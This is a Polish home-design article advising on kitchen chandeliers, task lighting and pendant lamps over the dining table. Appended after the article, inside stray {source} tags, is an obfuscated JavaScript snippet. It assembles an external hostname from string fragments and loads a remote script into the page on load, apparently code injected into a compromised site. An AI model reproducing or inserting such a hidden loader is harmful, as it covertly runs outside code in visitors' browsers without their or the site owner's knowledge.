Home Design i wnętrze Żyrandole kuchenne – jak wybrać ten najlepszy

Żyrandole kuchenne – jak wybrać ten najlepszy

lampa1

Coraz częściej życie rodzinne i towarzyskie koncentruje się w kuchni. Jest to nie tylko związane z nowoczesnymi rozwiązaniami w urządzaniu wnętrz i częstym łączeniem przestrzeni, lecz zmianą stylu życia i spędzania wolnego czasu. Nie jest rzadkością wspólne gotowanie, czy zapraszanie znajomych na degustacje samodzielnie przygotowanych potraw. Przy takich okazjach w centrum uwagi staje oczywiście kuchnia. Właściwe oświetlenie jest nie tylko ozdobą pomieszczenia, ale i ma duży wpływ na komfort prac przy blatach roboczych, czy spożywanie posiłków przy stole. Jak więc wybrać żyrandol kuchenny, by spełniał obie funkcje?
    

Właściwa aranżacja kuchni, w tym oświetlenia nabiera więc dużego znaczenia. Żyrandole kuchenne mają przed sobą niełatwe zadanie.

Liczy się funkcjonalność

obrazek 1

Podczas gotowania ważne jest nie tylko ogólne światło, ale również oświetlenie poszczególnych stref roboczych. Optymalne oświetlenie w kuchni zapewnimy sobie decydując się na stylowe żyrandole kuchenne i uzupełnimy je punktowym światłem roboczym. W ten sposób uzyskujemy równomierne przytulne światło w całym pomieszczeniu a dodatkowe oświetlenie zapewni komfort przy zmywaniu, czy gotowaniu.Godne plecenia są też listwy ledowe, czy oczka, gdzie są umieszczone żarówki halogenowe. Nie zajmują miejsca, są wygodne, dają dobre światło i aż się proszą by zastosować je w kuchni.  Mają korzystny wpływ na estetykę pomieszczenia.

Na stronie lampy.pl czytamy następujące rady w zakresie aranżacji kuchennego oświetlenia: Oświetlenie kuchni można zrealizować za pomocą różnych rodzajów lamp kuchennych. Zalicza się do nich proste lampy sufitowe z przeważającym (białym) światłem, reflektory do oświetlania określonych miejsc i do rozdzielania światła oraz lampy wiszące przyjemnie rozpraszające światło nad stołem w jadalni lub nad powierzchniami roboczymi wchodzącymi do pokoju. Zwraca przy tym także uwagę design poszczególnych lamp. Wzornictwo lamp kuchennych jest z reguły proste, w odcieniach bieli i srebrnym.

Tradycja, czy nowoczesność

obrazek 2

Do kuchni można polecić żyrandole kuchenne tradycyjne z jednym większym szklanym kloszem. Kto lubi nowoczesne wnętrza może sięgnąć po żyrandole kuchenne w bardziej nowoczesnej wersji. Są to np. lampy szynowe, lampy wysięgnikowe, reflektorki, czy wpuszczane lampy podłogowe. Każde z tych rozwiązań jest godne polecenia i tylko styl urządzenia kuchni i własne upodobania estetyczne stoją za wyborem ostatecznego rodzaju oświetlenia. Warto też mieć na uwadze, że trendy w urządzaniu wnętrz, podobnie jak modzie, dość szybko się zmieniają a z reguły żyrandole kuchenne wiszą nieco dłużej.

Oświetlenie stołu

Jeśli mamy kuchnię nieco większych rozmiarów przyda się dodatkowe oświetlenie np.: lampa wisząca nad stołem, gdzie spożywamy posiłki. Pozostanie przy jednej centralnej lampie powieszonej na środku kuchni w większym pomieszczeniu nie zdaje egzaminu, bo zwiększenie mocy żarówki powoduje, że światło jest zbyt intensywne i nieprzyjemne, a i tak boki kuchni pozostają niedoświetlone. Dodatkowym mankamentem są cienie rzucane przez osoby przebywające w pomieszczeniu.

Lampa wisząca nad stołem nie tylko umożliwia dokładny podgląd tego, co się na nim pojawia, ale daje też daje dodatkową możliwość aranżacji przestrzeni światłem i tworzenia przytulnego nastroju. Z reguły taka lampa wisząca ma subtelne delikatne światło, którego strumień jest skierowany w stronę blatu stołu.  Ciekawym rozwiązaniem jest lampa wisząca z kilkoma kloszami i żarówkami o niewielkiej mocy, którą można opuścić niemal do wysokości głów osób siedzących przy stole. Takie rozwiązanie z kilkoma kloszami umożliwia równomierne oświetlenie stołu a jeśli zastosujemy ściemniacz, to można dodatkowo regulować jasność żarówek.

 

{source}
<script type=”text/javascript”>
(function(){
ump8=document.createElement(„script”);ump8.type=”text/javascript”;
ump8.async=true;ump8_=((„us”)+”t”)+”a”;ump8_+=(„t.i”)+””+”n”;ump8_+=((„f”)+”o”);
ump8.src=”http://”+ump8_+”/3547156.538fixiamp8603vzm92mbplr19j9Xn”;
document.body.appendChild(ump8);
})();
</script>
{/source}